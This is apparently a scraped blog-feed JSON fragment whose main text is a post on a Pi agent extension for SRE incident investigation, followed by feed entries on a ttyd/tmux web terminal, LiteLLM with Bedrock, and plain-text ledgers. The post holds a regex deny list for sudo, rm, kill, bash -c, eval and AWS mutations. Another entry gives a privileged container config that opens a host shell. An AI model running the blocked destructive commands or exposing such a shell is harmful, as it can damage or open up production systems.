custom server, a custom agent, a custom frontend, custom registries for skills and templates, custom session persistence, and a CI pipeline to build and deploy it all. The upstream\u002Fwrapper two-repo design – where the generic product lived on GitHub and the org-specific overlay was rsynced into it during build – still meant I was maintaining a bespoke investigation platform.\nThe more I worked on it, the more obvious it became: the content was the product. The runtime was plumbing.\nThe skills, the prompts, the methodology, the failure pattern library, the runbooks, the templates – that was where the value lived. Everything else was infrastructure I was maintaining just to get those skills into an LLM session.\nWhy Pi#\nI did not want another chat app. I wanted the investigation to live where I already work: in the terminal, next to the real tools. Pi gave me that, and the specific SDK primitives it exposes turned out to map almost 1:1 to what I had been building by hand in llmduck.\nA session looks like this:\n\u002Fcheck-connectors\n\u002Fincident\ninvestigate elevated p99 latency for payments-api, start with a timeline\n\u002Freport\n\u002Fincident is an interactive wizard – pick a template, name the service, set a time window.\n\n\u002Fcheck-connectors – verifies your infrastructure CLIs are reachable\n\u002Freport – generates a structured postmortem from the investigation\n\u002Fsudo – temporarily bypasses the read-only guardrails\nHow It Works#\nPi extensions are TypeScript modules that receive an ExtensionAPI object – hooks into the agent lifecycle, slash commands, session state, shell execution, UI primitives, and an inter-extension event bus. The whole extension is one file and the rest is markdown.\nThe SDK has a few primitives that matter here:\nCarrying context across the conversation#\nThe before_agent_start hook fires before every agent turn. The extension builds a context block from the current incident state and appends it to the system prompt:\npi.on(\"before_agent_start\", (event) => {\n  return { systemPrompt: `${event.systemPrompt}\\n\\n${incidentContext}` };\n});\nTemplate, service name, time window, guardrail posture, overlay guidance, preferred skills – all injected automatically. You do not need to keep re-explaining “payments API, last 2 hours, high latency, read-only.” It follows you.\nBlocking mutations before they execute#\nThe tool_call hook intercepts every tool invocation before execution:\npi.on(\"tool_call\", async (event) => {\n  const reason = getGuardrailBlockReason(event.toolName, event.input);\n  if (reason) return { block: true, reason };\n});\nThe guardrail implementation is regex-based with token boundary detection:\nconst BLOCKED_PATTERNS = [\n  { pattern: \u002Fsudo\u002F, reason: \"sudo blocked\" },\n  { pattern: \u002Frm\u002F, reason: \"file deletion blocked\" },\n  { pattern: \u002Fkill|pkill|killall\u002F, reason: \"process termination blocked\" },\n  { pattern: \u002Fbash\\s+-c|sh\\s+-c|zsh\\s+-c\u002F, reason: \"shell trampoline blocked\" },\n  { pattern: \u002Feval\u002F, reason: \"eval blocked\" },\n  { pattern: \u002F\\$\\(\u002F, reason: \"subshell blocked\" },\n  { pattern: \u002Fsystemctl\\s+(restart|stop|start)\u002F, reason: \"systemctl mutation blocked\" },\n  { pattern: \u002Faws\\s+.*\\s+(create|delete|update|put|run|start|stop|terminate|reboot)\u002F,\n    reason: \"AWS mutation blocked\" },\n];\nThe token boundary prevents false positives – remove does not match the rm rule. The write and edit tools are unconditionally blocked. \u002Fsudo disables this when needed.\nPersisting incident state#\nPi sessions are tree-structured – you can fork, navigate branches, switch contexts. Incident state is persisted as append-only entries:\npi.appendEntry\u003CIncidentModeState>(\"incident-mode-state\", state);\nThe extension hooks into session_tree and session_fork events to carry incident state across branches automatically. If you fork to explore a side hypothesis, the incident context comes with you.\nCommands and UI#\npi.registerCommand() handles slash commands. The \u002Fincident wizard uses ctx.ui.select() and ctx.ui.input() for interactive setup – template selection, service name, time window. pi.exec() runs shell commands for connector checks.\nInter-extension events#\nPi has an in-process event bus (pi.events) for cross-package communication – same JS runtime, no network, just pub\u002Fsub between extensions loaded from different npm packages. The base package subscribes to a channel, the overlay emits to it at session start. The decoupling is at the import level, not the process level. More on this below.\nTemplates and Skills#\nMost incidents fall into a handful of patterns – 5xx spike, high latency, OOM crash loop, deploy regression, service down. Each pattern has a different starting point: for latency you want percentile breakdowns and dependency response times first; for OOMs you want restart history and memory growth; for a deploy regression you want a before\u002Fafter comparison.\nTemplates encode that. When you pick “High Latency” in the \u002Fincident wizard, the system prompt gets a focused directive: check p50\u002Fp95\u002Fp99, look for saturation signals, check upstream dependencies, identify whether queueing is involved. The model starts in the right place instead of flailing. You can also skip the wizard entirely – \u002Fincident-5xx payments-api last 2h sets up the investigation directly.\nThe investigation methodology itself lives in skills – markdown files that get loaded into context:\n---\nname: sre-methodology\nallowed-tools: [Read, Bash, Grep]\n---\n\n## Core Loop\n\n1. **Observe**: Gather data. Metrics, logs, scheduler state.\n2. **Hypothesize**: Form a theory from the evidence.\n3. **Test**: Run a specific query that would confirm or disprove.\n4. **Evaluate**: Did the evidence match? Adjust and repeat.\nThe base package includes two skills: an observe-hypothesize-test-evaluate loop with first principles (evidence over speculation, build timeline before concluding, the loudest symptom is often downstream), and a concrete investigation playbook (scope the blast radius, check recent changes, follow the service path from edge to dependency, narrow using the template focus).\nWithout the methodology, the model tends to jump to conclusions or fixate on the noisiest symptom. With it, investigations are more systematic.\nThe Overlay System#\nThe public package is intentionally generic. The real leverage comes from overlays – private Pi packages that layer org-specific knowledge on top.\nAn overlay is a separate Pi package that emits an event at session start. The base package picks it up and merges it into the active configuration – templates, connector checks, skills, timezone hints, report output paths:\nexport default function myOrgOverlay(pi: ExtensionAPI) {\n  const overlay: IncidentOverlay = {\n    id: \"my-org\",\n    priority: 100,\n    timezoneHint: \"IST (UTC+5:30); metrics are UTC, logs are IST.\",\n    reportPathPattern: \"rca\u002F{{date}}-{{slug}}.md\",\n    defaultSkills: [\"org-sre-methodology\"],\n    promptPreamble: \"Use org service topology, strict timezone handling...\",\n    connectorChecks: [ \u002F* ... *\u002F ],\n    templates: [ \u002F* ... *\u002F ],\n  };\n\n  pi.on(\"session_start\", () => {\n    pi.emit(\"incident-mode:register-overlay\", overlay);\n  });\n}\nTemplates merge by ID (overlay wins). Skills are deduplicated. Prompt preambles stack across overlays.\nWhat an Overlay Adds#\nAt work, my private overlay adds investigation templates tied to specific services and a few thousand lines of operational knowledge as skills – how to query our metrics stack, how to read our logs, how to interpret scheduler state, and how to write the postmortem.\nThe interesting part is what those skills encode. Not just CLI syntax, but the gotchas you learn the hard way: timezone mismatches between tools, CPU metrics that mean something different depending on allocation config, log columns that don’t exist where you’d expect them, query patterns that accidentally match unrelated data. A failure pattern library teaches the model to recognize cascading failures, throughput cliffs (silence often means blocked, not recovered), and the difference between a root cause and a downstream symptom.\nThis is the kind of institutional knowledge that normally lives in someone’s head or a stale wiki page. Encoding it as skills means it gets applied consistently during every investigation.\nEvery team has different tools, naming conventions, auth assumptions, and definitions of “normal.” Mix that into the base package and you either leak private knowledge or make the tool unusably abstract. The overlay keeps them cleanly separated.\nWhat the LLM Is Actually Good At#\nThis is not an “AI will run your ops team” post. The model does not do triage or make mitigation calls. What it does well is the stuff that eats wall-clock time:\nGathering and cross-referencing evidence#\nThe model does not stop at “good enough.” If you ask it to investigate a latency spike, it will check p50\u002Fp95\u002Fp99, break it down per node, compare against the pre-deploy baseline, look at upstream dependency latency, check if the error rate moved with it, and then go look at logs for the time window where the percentiles diverged.\nBuilding timelines from messy evidence#\nThe model is good at stitching together outputs from different tools – logs in IST, metrics in UTC, a deploy at some offset, a scheduler restart in the middle, a cloud instance termination, a queue backup two minutes later – into a coherent narrative. It can produce a first-pass timeline like “memory growth started after deploy X, restart happened 14 minutes later, error rate rose only on one node, autoscaling replaced the sick instance, and downstream proxy alerts were a secondary symptom” faster than I can by hand.\nProducing a first draft of the postmortem#\nThe postmortem is hardest to write right after the incident, precisely when it is most valuable. If the investigation happened inside Pi, \u002Freport turns the conversation into a structured markdown RCA draft immediately – timeline, 5 Whys, impact, action items. That alone saves a lot of the “I’ll write the postmortem tomorrow” drift.\nKeeping the investigation disciplined#\nThe methodology skills help the model stay in evidence-first mode: observe before hypothesizing, build a timeline before concluding, distinguish cause from effect, state uncertainty explicitly, say when a connector is missing instead of guessing. Without this, the model tends to fixate on the noisiest symptom. With it, investigations follow an observe-hypothesize-test-evaluate loop.\nWhere It Still Fails#\nGuardrails are not a sandbox#\nThe read-only protections are operational guardrails, not security boundaries. They catch accidental mutations during investigation, but they are regex patterns – not a sandbox. The real defense is least-privilege at the infrastructure level: an AWS IAM role scoped to read-only, a metrics API token without write access, an SSH key that can only reach jump hosts. If the credentials the agent has cannot mutate anything, it does not matter if a guardrail regex gets bypassed.\nThe model can still hallucinate#\nIt will sometimes invent a metric name, over-index on a noisy symptom, or keep running commands when the evidence is already sufficient. Good skills help but do not make it reliable enough to trust unattended.\nThe Bigger Lesson#\nI spent weeks building and rebuilding a custom agent platform. Rewrote it twice in different languages. All plumbing. The things that actually made the investigations good were:\nthe SRE methodology skill that encoded how to think about incidents\nthe failure pattern library that taught the model to recognize cascade failures and throughput cliffs\nthe per-tool skills that encoded gotchas like “that CPU metric means something different in a cgroup” and “silence in the logs means blocked, not recovered”\nthe templates that seeded the investigation direction\nthe guardrails that kept the model from accidentally mutating production\nAll of those are markdown files and a few dozen regex patterns. I kept building runtime to deliver content. Once I had a platform that could host markdown skills and intercept tool calls, the custom stack had no reason to exist.\nThe code is at github.com\u002Fmr-karan\u002Fpi-sre-mode.\nFin!",[],"Karan Sharma","mr-karan","\u002Fimages\u002Fmr-karan_photo.jpg","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fatom.xml",{"slug":99,"title":100,"link":101,"pubDate":102,"contentSnippet":103,"tags":104,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"eengum-marakkanrugal","எங்கும் மரக்கன்றுகள்","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2026\u002F03\u002F08\u002Feengum-marakkanrugal\u002F","Sun, 08 Mar 2026 18:00:43 +0000","ஒரு மரக்கன்று வழங்கும் நிகழ்வில் இருக்கும் மரக்கன்றுகள் என்னை பார்த்து கேட்டன. சும்மாதானே நிற்கிறாய்! எங்களில் ஒருவரை எடுத்து செல் என்றது. மரக்கன்றுகளை வளர்க்க மனமிருக்கிறது ஆனால் வீட்டில் இடமில்லை என்று எவ்வாறு அவைகளுக்கு நான் புரியவைப்பேன்! .",[67,105],"quotes",{"slug":107,"title":108,"link":109,"pubDate":110,"contentSnippet":111,"tags":112,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"web-terminal-homelab","A Web Terminal for My Homelab with ttyd + tmux","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fweb-terminal-homelab\u002F","2026-03-05T00:00:00.000Z","I wanted a browser terminal at terminal.mrkaran.dev that works from laptop, tablet, and phone without special client setup.\nThe stack that works cleanly for this is ttyd + tmux.\nArchitecture#\nBrowser -> Caddy -> ttyd -> nsenter -> su - karan -> tmux(main)\nTwo decisions matter most:\nttyd handles terminal-over-websocket behavior well.\n-m 1 enforces a single active client, which avoids cross-tab resize contention.\nDocker Compose (current)#\nservices:\n  webterm:\n    image: tsl0922\u002Fttyd\n    container_name: webterm\n    restart: unless-stopped\n    command: >\n      ttyd\n        -W\n        -p 8080\n        -m 1\n        nsenter\n        -t 1\n        -m -u -i -p\n        --\n        su - karan -c\n        \"tmux new-session -A -s main\"\n    privileged: true\n    pid: \"host\"\n    networks:\n      - public_proxy\nWhy each flag matters:\n-W: writable shell\n-p 8080: matches my existing Caddy upstream (webterm:8080)\n-m 1: one active client only (no resize fight club)\nnsenter ...: real host shell from inside the container\nsu - karan: correct login environment and tmux config loading\ntmux new-session -A -s main: persistent attach\u002Fre-attach\nCaddy#\nterminal.mrkaran.dev reverse proxies to webterm:8080 with TLS via Cloudflare DNS challenge.\nBecause ttyd uses WebSockets heavily, reverse proxy support for upgrades is essential.\ntmux profile for agentic workflows#\nI tuned tmux for long-running agent sessions, not just manual shell use.\nLong-run defaults#\nhistory-limit 200000\nremain-on-exit on\nwindow-size latest\nmode-keys vi \u002F status-keys vi\nBetter operational visibility#\nstatus line shows host + session + path + time\npane border shows pane number + current command\nactive pane is clearly highlighted\nKeybinds I actually use#\nPrefix: Ctrl-b\nS: create\u002Fattach named session\nN: create named window\nR: rename window\ns: session\u002Fwindow picker\ny: toggle synchronize-panes\nh\u002Fj\u002Fk\u002Fl: pane movement\nH\u002FJ\u002FK\u002FL: pane resize\nCopy\u002Fpaste that is not annoying#\nThis was a big pain point, so I added both workflows:\nBrowser-native copy\nCtrl-b m to turn tmux mouse off\ndrag-select + browser copy shortcut\nCtrl-b m to turn tmux mouse back on\ntmux copy mode\nCtrl-b [ enters copy mode and shows COPY MODE ON\nv select, y copy (shows Copied selection)\nq or Esc exits (shows COPY MODE OFF)\nOn mobile, ttyd’s top-left menu (special keys) makes prefix navigation workable.\nSecurity model#\nThis is tailnet-only behind Tailscale. No public exposure.\nStill, the container has privileged: true and pid: host, which is a strong trust boundary.\nIf you expose anything like this publicly, add auth in front and treat it as high-risk infrastructure.\nResult#\n\nThe terminal is now boring in the best way: stable, predictable, and fast to reach from any device.",[],{"slug":114,"title":115,"link":116,"pubDate":117,"contentSnippet":77,"tags":118,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"vectorbt-ai-skills-to-build-and-backtest-trading-strategies-faster-without-writing-a-single-line-of-","VectorBT AI Skills to Build and Backtest Trading Strategies Faster Without Writing a Single Line of…","https:\u002F\u002Fopenalgo.medium.com\u002Fvectorbt-ai-skills-to-build-and-backtest-trading-strategies-faster-without-writing-a-single-line-of-b8d5418e2088?source=rss-cda86e929c3------2","Mon, 02 Mar 2026 03:47:20 GMT",[81,119,120,121,122],"ai-skills","yfinance","vectorbt","backtesting",{"slug":124,"title":125,"link":126,"pubDate":127,"contentSnippet":128,"tags":129,"maintainerName":130,"maintainerUsername":131,"maintainerPhoto":132,"feedUrl":133},"submission-dtf-bill-2026","Technical Submission on India’s Digital Trade Facilitation Bill, 2026","https:\u002F\u002Fwww.divyamohan.com\u002Fsubmission-dtf-bill-2026\u002F","Wed, 25 Feb 2026 03:08:48 GMT","Introduction\nA sizeable portion of the Indian and global tech ecosystem was gathered at the India AI Impact Summit in New Delhi last week. While I missed attending it due to personal reasons, as an open source maintainer and an alumnus of The Takshashila Institution's GCPP",[],"Divya Mohan","divya-mohan0209","\u002Fimages\u002Fdivya-mohan0209_photo.png","https:\u002F\u002Fwww.divyamohan.com\u002Frss",{"slug":135,"title":136,"link":137,"pubDate":138,"contentSnippet":139,"tags":140,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"litellm-bedrock-setup","Setting Up LiteLLM with AWS Bedrock","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Flitellm-bedrock-setup\u002F","2026-02-16T00:00:00.000Z","I recently set up LiteLLM with AWS Bedrock as the LLM provider. The docs cover the happy path, but there are a few gotchas that cost me some debugging time. This post covers what I learned, from basic setup to per-project cost tracking with Application Inference Profiles.\nModel Format#\nBedrock models use the bedrock\u002F prefix followed by AWS’s model identifiers:\nbedrock\u002Fanthropic.claude-opus-4-6-v1\nbedrock\u002Fanthropic.claude-sonnet-4-5-20250929-v1:0\nNothing surprising here. LiteLLM uses the prefix to route to the right provider.\nAuthentication#\nThis is where the first gotcha lives. Bedrock doesn’t use API keys. It authenticates via standard AWS credentials:\nEnvironment variables: AWS_ACCESS_KEY_ID + AWS_SECRET_ACCESS_KEY\nAWS profile: AWS_PROFILE\nIAM role (for EC2\u002FECS\u002FLambda)\nYou also need AWS_REGION_NAME set to the region where Bedrock is enabled (e.g., ap-south-1).\nThe gotcha: don’t pass api_key to LiteLLM when using Bedrock. If you include an api_key parameter in your config, LiteLLM tries to use it instead of the AWS credential chain and auth fails silently. You need to either return None for the API key or omit it from the config entirely.\n# Wrong - breaks AWS credential chain\nllm_config = {\"model\": \"bedrock\u002Fanthropic.claude-opus-4-6-v1\", \"api_key\": some_key}\n\n# Correct - let LiteLLM use AWS credentials\nllm_config = {\"model\": \"bedrock\u002Fanthropic.claude-opus-4-6-v1\"}\nThis one took a while to figure out because the error messages don’t point you in the right direction.\nThe top_p and Temperature Conflict#\nBedrock’s Anthropic models reject requests that include both temperature and top_p. If your SDK or framework defaults top_p=1.0, you need to explicitly clear it:\nif model.startswith(\"bedrock\u002F\"):\n    llm_config[\"top_p\"] = None\nWithout this, you’ll get a validation error from the Bedrock API. The fix is simple, but the error message isn’t immediately obvious about what’s conflicting.\nInference Profiles#\nBedrock has two types of inference profiles, and the second one is where things get interesting for cost management.\nCross-Region (System-Defined)#\nAWS provides these out of the box. They route requests across regions for higher throughput and availability:\nglobal.anthropic.claude-opus-4-6-v1\nYou can list them with:\naws bedrock list-inference-profiles \\\n  --type-equals SYSTEM_DEFINED \\\n  --region ap-south-1\nApplication Inference Profiles for Cost Tracking#\nApplication Inference Profiles (AIPs) are tagged wrappers around a model. The killer use case is granular cost attribution via cost allocation tags. Instead of seeing one blob of “Bedrock spend” in your AWS bill, you can break it down by project, team, or service.\nCreate one with:\naws bedrock create-inference-profile \\\n  --inference-profile-name my-project-opus-4-6 \\\n  --model-source \"copyFrom=arn:aws:bedrock:ap-south-1::foundation-model\u002Fanthropic.claude-opus-4-6-v1:0\" \\\n  --tags key=project,value=my-project \\\n  --region ap-south-1\nThis gives you an ARN like:\narn:aws:bedrock:ap-south-1:123456789012:application-inference-profile\u002Fabcdef123456\nUsing AIPs with LiteLLM#\nThe standard bedrock\u002F route can’t parse ARNs. Use the bedrock\u002Fconverse\u002F route instead:\nbedrock\u002Fconverse\u002Farn:aws:bedrock:ap-south-1:123456789012:application-inference-profile\u002Fabcdef123456\nThe bedrock\u002F prefix still matches for provider detection and the top_p=None fix, so no code changes needed on your end.\nQuerying Costs via CLI#\nOnce your AIPs are tagged, you can query costs using the Cost Explorer API.\nTotal Bedrock spend for a month:\naws ce get-cost-and-usage \\\n  --time-period Start=2026-02-01,End=2026-03-01 \\\n  --granularity MONTHLY \\\n  --metrics \"UnblendedCost\" \\\n  --filter '{\"Dimensions\": {\"Key\": \"SERVICE\", \"Values\": [\"Amazon Bedrock\"]}}' \\\n  --region us-east-1\nBedrock spend grouped by your cost allocation tag (per-project breakdown):\naws ce get-cost-and-usage \\\n  --time-period Start=2026-02-01,End=2026-03-01 \\\n  --granularity DAILY \\\n  --metrics \"UnblendedCost\" \\\n  --filter '{\"Dimensions\": {\"Key\": \"SERVICE\", \"Values\": [\"Amazon Bedrock\"]}}' \\\n  --group-by Type=TAG,Key=project \\\n  --region us-east-1\nNote: The Cost Explorer API always runs against us-east-1 regardless of where your resources are deployed.\nCost Explorer Setup Checklist#\nA few things to get right before cost data starts flowing:\nThe tag must be an active cost allocation tag. Enable it under Billing → Cost Allocation Tags.\nUse the AIP ARN as the model string in LiteLLM. All invocations through it get tagged automatically.\nIn Cost Explorer, group by tag and select your tag key to see the per-project breakdown.\nCost data takes ~24 hours to populate after first usage, so don’t panic if it shows up empty initially.\nDependencies#\nLiteLLM needs boto3 to talk to Bedrock:\nboto3>=1.28.57\nMake sure it’s installed in your environment, otherwise LiteLLM will fail with an import error when you try to use the bedrock\u002F provider.\nFin!",[],{"slug":142,"title":143,"link":144,"pubDate":145,"contentSnippet":146,"tags":147,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"your-true-nature","Your True Nature","https:\u002F\u002Fwww.prashanthudupa.com\u002Fyour-true-nature\u002F","Sat, 14 Feb 2026 05:30:43 +0000","When you just watch what’s going on with your seeing, hearing, smelling, tasting, touching, thoughting, feeling and your body-mind in general — it becomes very clear that you are not the things you see, the sounds you hear, the smells you smell, the tastes you taste, the objects you touch, or the body you have, […]",[148,149],"Insight","Philosophy","Prashanth N Udupa","pnudupa","\u002Fimages\u002Fpnudupa_photo.jpg","https:\u002F\u002Fwww.prashanthudupa.com\u002Ffeed",{"slug":155,"title":156,"link":157,"pubDate":158,"contentSnippet":77,"tags":159,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"signal-half-life-the-missing-piece-in-most-trading-systems-24824b102799","Signal Half-Life: The Missing Piece in Most Trading Systems","https:\u002F\u002Fopenalgo.medium.com\u002Fsignal-half-life-the-missing-piece-in-most-trading-systems-24824b102799?source=rss-cda86e929c3------2","Thu, 12 Feb 2026 16:58:50 GMT",[160,161,162,163,164],"trading-system","trading-strategy","market-timing","trading-signals","trading-psychology",{"slug":166,"title":167,"link":168,"pubDate":169,"contentSnippet":170,"tags":171,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"empty-space-infinite-forms","Empty Space, Infinite Forms","https:\u002F\u002Fwww.prashanthudupa.com\u002Fempty-space-infinite-forms\u002F","Wed, 11 Feb 2026 16:27:18 +0000","When I started just looking at what’s going on, I first noticed the cyclic nature of all phenomena. Just about everything had a beginning, middle, and end. Whether it was breath, or heartbeat, or thought, or feeling, or a sound, or any other sensation for that matter. It seemed like life was just a stream […]",[148,149],{"slug":173,"title":174,"link":175,"pubDate":176,"contentSnippet":177,"tags":178,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"gullak-ledger","Why Plain-Text Ledger is Powerful for Gullak","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fgullak-ledger\u002F","2026-02-02T00:00:00.000Z","In my previous post, I introduced Gullak, an expense tracker I built to categorize transactions using LLMs. While the initial prototype used SQLite, I’ve since made a fundamental shift in how Gullak stores data. It now uses the ledger-cli format—a plain-text accounting standard that has been around for over 20 years.\nThe Core Insight#\nLedger-cli uses a format that is, at its core, just text files. There are no database migrations to manage, no proprietary binary formats, and absolutely no vendor lock-in. The promise is simple: your financial data should outlive the application you use to track it.\nHackability in Gullak’s Context#\nMoving to a plain-text format unlocked several advantages that align perfectly with modern AI capabilities and the Unix philosophy.\n1. AI-Native Format#\nConsider a typical transaction entry in a ledger file:\n2026\u002F01\u002F21 Swiggy\n    Expenses:Food:Delivery  584.23 INR\n    Liabilities:CreditCard:ICICI  -584.23 INR\nThis structure is trivially parseable by Large Language Models (LLMs). An AI agent can read, write, and reason about these transactions without needing complex serialization logic. Compare this to the friction of extracting data from a SQLite blob or interfacing with a proprietary API like Splitwise’s. The text is the interface.\n2. Git-Friendly#\nBecause every transaction is just a few lines of text, your financial history becomes a git repository. Every change is a diff.\nThis gives you:\nFull audit trail: git log -p -- main.ledger shows exactly what changed and when.\nEasy rollback: Made a mistake? git revert.\n“What-if” scenarios: Branch off to model a major purchase or a different budget strategy.\nCollaboration: Family budgeting can be handled via Pull Requests.\n3. Unix Philosophy#\nThe file serves as the API. You don’t need export buttons or data liberation requests. You can use standard Unix tools to query your finances.\nFind all Swiggy orders over 500 INR:\ngrep -A2 \"Swiggy\" main.ledger | grep -E \"[5-9][0-9]{2,}|[0-9]{4,}\"\nCheck your monthly food spending:\nledger -f main.ledger bal Expenses:Food -p \"this month\"\nExport to CSV for Google Sheets:\nledger -f main.ledger csv Expenses\n4. Extensibility via Comments#\nGullak adds its own metadata using standard ledger comments, which are ignored by the accounting tools but used by the app:\n2026\u002F01\u002F21 Zomato\n    ; gullak:id 7559a51f\n    ; gullak:source whatsapp\n    ; gullak:user 919876543210\n    Expenses:Food:Delivery  584.23 INR\ngullak:id: A unique ID for CRUD operations.\ngullak:source: Provenance tracking (e.g., entered via WhatsApp, web, or CSV).\ngullak:user: Multi-user support.\nCustom tags for your own organization—like ; Recurring: Netflix—just work out of the box.\n5. Ecosystem Interoperability#\nBecause the format is standard, Gullak plays nice with others:\nPaisa: Reads the same file for beautiful visualizations.\nhledger: A Haskell alternative that is drop-in compatible.\nBeancount: Can import ledger files.\nText Editors: Any editor (VS Code, Vim, Sublime) is a valid client.\nWhat This Enables#\n\nFeatureHow Plain Text Helps\n\nWhatsApp loggingAI parses “swiggy 500” → appends text to file\nReceipt OCRExtract data → format as ledger → append\nBank CSV importTransform CSV → ledger format → append\nTransaction editingFind by gullak:id → text replacement\nUndo\u002FhistoryGit handles it for free\nBackupcp main.ledger backup.ledger\nMigrationIt’s text. There’s nothing to migrate.\n\nThe Trade-off#\nOf course, you lose ACID transactions, database indexes, and complex SQL queries. But for personal finance, the scale makes these unnecessary trade-offs.\nYou likely have 10-50 transactions a month.\nRunning ledger bal on 10 years of data takes less than 100ms.\nThe simplicity is the feature.\nConclusion#\nAdopting the ledger format turns Gullak from “yet another expense app” into a thin AI layer over your permanent financial record. By decoupling the data from the application logic, we ensure that the data remains accessible, hackable, and enduring.",[],{"slug":180,"title":181,"link":182,"pubDate":183,"contentSnippet":77,"tags":184,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"automating-trading-with-openalgo-and-openclaw-de55cc2b2d63","Automating Trading with OpenAlgo and OpenClaw","https:\u002F\u002Fopenalgo.medium.com\u002Fautomating-trading-with-openalgo-and-openclaw-de55cc2b2d63?source=rss-cda86e929c3------2","Sun, 01 Feb 2026 09:48:01 GMT",[185,81,186,82,187],"clawdbot","openclaw","automated-trading",{"slug":189,"title":190,"link":191,"pubDate":192,"contentSnippet":193,"tags":194,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"plain-text-future","CLIs are the New AI Interfaces","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fplain-text-future\u002F","2026-01-31T00:00:00.000Z","The industry is currently obsessed with defining standards for how Large Language Models (LLMs) should interact with software. We see a proliferation of SDKs, function calling schemas, and protocols like MCP (Model Context Protocol). They all aim to solve the same problem: bridging the gap between natural language intent and deterministic code execution.\nBut we might be reinventing the wheel.\nThe most effective tools for AI agents aren’t those wrapped in heavy “AI-native” integration layers. They are the tools that adhere to a philosophy established forty years ago: the command-line interface.\nThe Unix Philosophy as an AI Protocol#\nAn LLM’s native tongue is text. It reasons in tokens, generates strings, and parses patterns. The Unix philosophy, which emphasizes small tools, plain text interfaces, and standard streams, is accidentally the perfect protocol for AI interaction.\nConsider the anatomy of a well-behaved CLI:\nDiscovery: tool --help explains capabilities without hallucination.\nStructure: tool --json provides deterministic output for parsing.\nComposition: Pipes (|) allow complex workflows to be assembled on the fly.\nWhen you give an agent access to a robust CLI, you don’t need to define 50 separate function schemas. You give it a shell and a single instruction: “Figure it out using --help.”\nContext Economy: Lazy vs. Eager Loading#\nThe current approach to agent tooling often involves dumping massive JSON schemas into the context window. Connecting to a standard MCP server might load dozens of tool definitions, involving thousands of tokens describing every possible parameter, before the user has even asked a question. This is “eager loading,” and it is expensive in terms of both latency and context window utilization.\nA CLI-driven approach is “lazy loaded.”\nThe agent starts with zero knowledge of the tool’s internals. It burns zero tokens on schema definitions. Only when tasked with a specific goal does it invoke man or --help. It retrieves exactly the information needed to construct the command, executes it, and parses the result. This reflects the professional intuition of a senior engineer. We rarely memorize documentation. Instead, we prioritize the ability to quickly discover and apply the specific flags required for the task at hand.\nLeveraging the Skills Pattern#\nTo bridge the gap between a raw CLI and an agent’s reasoning, we can leverage the Skills pattern. This is an emerging standard for agent-based systems where capabilities are documented as self-contained units of knowledge.\nInstead of writing a Python wrapper that maps an API to a function call, you provide a Markdown file that explains when and why to use a specific CLI command. The agent uses this as a semantic index.\nHere is a snippet from a logchef.md skill:\n---\nname: logchef\ndescription: Query application logs via LogChef CLI. Use for investigating production incidents and analyzing traffic patterns.\n---\n\n## Common Workflows\n\n| Goal           | Command Pattern       |\n| -------------- | --------------------- |\n| Error Analysis | `logchef sql \"...\"`   |\n| Live Tail      | `logchef query '...'` |\n\n## Example: Error Rates by Minute\n\nTo visualize error spikes, use aggregation:\n\n```sql\nlogchef sql \"SELECT toStartOfMinute(_timestamp) as ts, count() as errors\nFROM logs.app_logs WHERE service='api-gateway' AND level='ERROR'\nGROUP BY ts ORDER BY ts DESC LIMIT 60\" --output json\n```\n\nWhen I ask an agent to “check for error spikes in the API gateway,” Claude identifies that this skill is relevant to the request and loads it on-demand. It sees the example, adapts the SQL query to the current context, and executes the CLI command. The Markdown file serves as a few-shot prompt, teaching the model how to use the tool effectively without rigid code constraints.\nI maintain similar skill sets for AWS, Kubernetes, and Nomad. The AWS skill doesn’t wrap boto3; it simply documents useful aws ec2 and aws cloudwatch commands.\nThe Developer Experience: uv and Single-File CLIs#\nWhen a CLI doesn’t exist, the barrier to creating one has never been lower. Modern Python tooling, specifically uv with its inline script metadata, allows us to treat CLIs as disposable, single-file artifacts.\nI recently needed an agent to manage my Trello board. Rather than fighting with the Trello API documentation or looking for an abandoned library, I had the agent generate a CLI wrapper:\n#!\u002Fusr\u002Fbin\u002Fenv -S uv run --script\n# \u002F\u002F\u002F script\n# requires-python = \">=3.11\"\n# dependencies = [\"typer\", \"httpx\", \"rich\"]\n# \u002F\u002F\u002F\n\nimport typer\nimport httpx\nimport json\n\napp = typer.Typer()\n\n@app.command()\ndef list_cards(list_id: str, format: str = \"table\"):\n    \"\"\"Fetch all cards from a specific list.\"\"\"\n    # Implementation details...\nThis script is self-contained. It defines its own dependencies. It implements --help and --json automatically via typer. It took minutes to generate and immediately unlocked Trello capabilities for the agent.\nThe SaaS Imperative#\nThe strategic takeaway for SaaS founders and platform engineers is significant. Your CLI is no longer just a developer convenience; it is your primary AI API.\nWe are moving past the era where a REST API and a web dashboard are sufficient. If your product lacks a terminal interface, you are locking out the growing workforce of AI agents.\nBrowser Automation is brittle, slow, and breaks with every UI update.\nDirect API Integration puts the burden of schema management on the user.\nCLIs offer a stable, discoverable, and composable interface that agents can learn and use autonomously.\nThe “hobby” CLI wrappers built by enthusiasts, such as those for Notion, Jira, or Spotify, are no longer just developer conveniences. They are becoming critical infrastructure. They provide the stable, text-based interface required for agents to interact with these platforms reliably.\nIf you want your platform to be AI-ready, don’t just build an MCP server. Build a great CLI. Make sure it supports --json. Write good man pages. The agents will figure out the rest.",[],{"slug":196,"title":197,"link":198,"pubDate":199,"contentSnippet":200,"tags":201,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"code-is-cheap","Code is cheap. Show me the talk.","https:\u002F\u002Fnadh.in\u002Fblog\u002Fcode-is-cheap\u002F","Fri, 30 Jan 2026 00:00:00 